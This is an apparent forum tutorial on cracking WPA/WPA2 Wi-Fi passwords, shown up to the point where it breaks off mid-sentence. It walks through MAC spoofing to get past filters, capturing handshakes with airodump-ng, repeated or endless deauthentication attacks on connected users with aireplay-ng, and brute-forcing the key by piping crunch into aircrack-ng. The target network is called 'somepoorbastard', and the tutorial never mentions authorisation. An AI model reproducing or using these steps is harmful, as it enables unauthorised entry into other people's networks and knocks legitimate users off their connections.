WPA/WPA2 hacking

  • WPA/WPA2 Cracking by BurnMeDown
    Software in use
    OS: Ubuntu 10.04 lts
    Software: Crunch 3.3 Dictionary maker
    Note to begin with this tutorial. Do not expect to crack a wpa quickly. They take time(days, weeks, months) to crack. 
    Some tips before we start. 
    Major companies like At&t, comcast, charter. often use 12 digit numerical passwords.
    4 in 10 passwords are often phone numbers in your local area.
    2 in 10 are alpha numberical
    (Statistics are based on my personal research)
    To begin we need to turn off your wireless card to change the mac address. The following commands do this.(Enter without listing numbers)
    1. airmon-ng stop wlan0
    2. macchanger -m 00:11:22:33:44:55 wlan0
    1. this turns off the wireless card allowing you to manipulate it.
    2. macchanger is good for hiding your mac address and also spoofing other mac addresses for when someone is using a mac filter to keep you out.
    Now we need to turn back on the card and get it in monitor mode.
    1. airmon-ng start wlan0
    The output after this command should show that mon0 is now enabled. Meaning you've put the card in monitor mode.
    Now lets get our hands dirty
    1. airodump-ng mon0
    2. airodump-ng -c 6 -w somepoorbastard --bssid 55:44:33:22:11:00 mon0
    1. This is the recon tool. It monitors everything in the area. You need to leave this window available at all times to determined if you got the handshake. the command starts the monitor mode.
    2. With this command you use your recon tool to lock on this persons AP. This must be opened in a new window or tab. Ill explain why this is for you in a minute. 
    Command explaination:
    -c 6(target channel the ap is on)
    -w(name of the file you wish to create that will hold the handshake.)
    --bssid 55:44:33:22:11:00(targets the mac address of the AP to lock on the signal.)
    mon0(tells airodump-ng to monitor this on device mon0)
    The recon window is what tells you if you have recieved the handshake, The lock down window won't do this. BUT!!!! the lockdown window is needed because when you lock onto the AP it creates a file that will hold the handshake when you get it. in this case the name of the file will be "somepoorbastard-01.cap"
    Now that we have that done. The handshake can actually be gotten at anytime just by leaving it sitting there, but that can take hours for it to happen. Lets do it the fast way but first some more tips.
    AP's that are close are easier to get a handshake from, the further they are away the hard you're going to have to work for it. In this tutorial I will show you 3 stages you can do for close, middle, and far away AP's. To do these stages tho we have someone we can disconnect from their AP's. That right you need to deauthorize another user that is actually connected to the AP you want the handshake from.
    Stage 1. aireplay-ng -0 1 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 2. aireplay-ng -0 10 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 3. aireplay-ng -0 0 -a 55:44:33:22:11:00 -c 33:22:11:00:44:55 mon0
    Stage 1 you can use for AP's that are close to you.
    Stage 2 you can use for AP's that are in about a middle range.
    Stage 3 you can use for AP's that are far away (these often take the longest)
    Command explaination:
    aireplay-ng This is used to conduct you basic attacks for retrieveing wifi data and passwords.
    -0 1 This tells aireplay-ng to conduct a deauth attack once. 10 for ten deauth attacks, and 0 for infinite attack(This works best for those users you need to deauth that are almost out of range.
    -a specifies the main bssid you are locked onto.
    -c specifies the user you are trying to disconnect from that bssid
    mon0 well you should have guessed what this is doing. tells aireplay-ng to attack with this device.
    Now if all has went well and you have disconnected a user and he reconnects you should have the WPA handshake. you can tell if you have the handshake by looking in the recon window at the top right it will say wpa handshake and list the mac address of which ap you got it from.
    Time to crack :) 
    if you have downloaded crunch (Which is required) you need to open a new tab or window. then change your directory in it to your crunch directory. 
    1. cd crunch3.3
    (explained) im not explaining this if you dont know what cd in a command window does then you don't belong here.
    Now that you have changed directories. We will pipeline crunch into aircrack-ng so its like a fire and forget dictionary that gets rid of the passwords its checked.(This helps from having to build large dictionary and taking up space on your computer)
    1. ./crunch 8 12 0123456789 | aircrack-ng -e somepoorbastard /home/user/somepoorbastard-01.cap -w -
    1. ./crunch calls the crunch command(only works in the crunch directory)
    2. 8 12 This is the minimal ammount and max ammount of characters to use.
    3. 0123456789 This is where you type which characters you want to use. any character can be placed there
    4. |  <